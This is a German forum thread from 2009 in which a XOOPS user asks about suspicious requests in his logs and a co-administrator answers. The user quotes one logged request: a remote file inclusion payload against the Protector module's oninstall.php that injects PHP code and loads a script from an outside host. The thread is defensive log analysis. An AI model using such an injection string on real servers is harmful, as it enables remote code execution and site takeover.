Muki
Co-Administrator
Gepostet am:17.06.2009 10:32
#4
Was hier interessant wäre, ist der Versuch von wo aus das ganze gestattet wurde.
Dieses siehst Du an:
Zitat:
Ob diese Domain wirklich die Ursprungsdomain ist lässt sich schwer sagen, jedoch ist Japan kein rechtsfreier Raum.
Es gibt ja auch die Möglichkeit wenn diese Anfragen immer die gleichen sind den Anfragenden ein Ergebnis zu geben, jedoch mit anderem Inhalt als dem erhofften. Ein Angreifender Server muss immer um einen Angriff zu starten erst selbst mal "die Hosen herunterlassen" und wird hierdurch selbst angreifbar.
Zitat:
Da ist man geteilter Meinung. Die einen verzichten darauf die anderen nicht. Da der Protector nun Bestandteil des neuen Xoops ist, wurde er auch eine Zusätzliche Angriffsquelle. Ob ihn sich jemand installiert oder nicht obliegt der Entscheidung des einzelnen.
Bei Installation von gewarteten Modulen die nach wie vor immer wieder Aktualisiert werden, ist MEINE MEINUNG man kann auf Ihn verzichten.
Wie gesagt das ist meine persönliche Meinung.
Muki
Aw:: Hacking Versuch?
17.06.2009 10:32 Zitat:
igor schrieb:
ich beobachte Seit geraumer Zeit massiv steigende Anfragen die ca so ausschauenhttp://www.domain.de//xoops_lib/modules/protector/oninstall.ph p?mydirname=a(){}include($_GET[a]);function
v&a=http://URL_ERSETZT.ac.jp/b1ttletX1.txt????
hängt das im Kausalem Zusammenhang mit der alten News zur Sicherheitslücke im Protector?
Was hier interessant wäre, ist der Versuch von wo aus das ganze gestattet wurde.
Dieses siehst Du an:
Zitat:
=http://URL_ERSETZT.ac.jp/
Ob diese Domain wirklich die Ursprungsdomain ist lässt sich schwer sagen, jedoch ist Japan kein rechtsfreier Raum.
Es gibt ja auch die Möglichkeit wenn diese Anfragen immer die gleichen sind den Anfragenden ein Ergebnis zu geben, jedoch mit anderem Inhalt als dem erhofften. Ein Angreifender Server muss immer um einen Angriff zu starten erst selbst mal "die Hosen herunterlassen" und wird hierdurch selbst angreifbar.
Zitat:
igor schrieb:
Gibt es eigentlich im Moment eine Empfelung ob man eine XOOPS Installation lieber mit oder ohne den Protector nutzen sollte?
Da ist man geteilter Meinung. Die einen verzichten darauf die anderen nicht. Da der Protector nun Bestandteil des neuen Xoops ist, wurde er auch eine Zusätzliche Angriffsquelle. Ob ihn sich jemand installiert oder nicht obliegt der Entscheidung des einzelnen.
Bei Installation von gewarteten Modulen die nach wie vor immer wieder Aktualisiert werden, ist MEINE MEINUNG man kann auf Ihn verzichten.
Wie gesagt das ist meine persönliche Meinung.
Muki
Es gibt keine dummen Fragen, nur dumme Antworten (Ausnahmen bestätigen die Regel). 
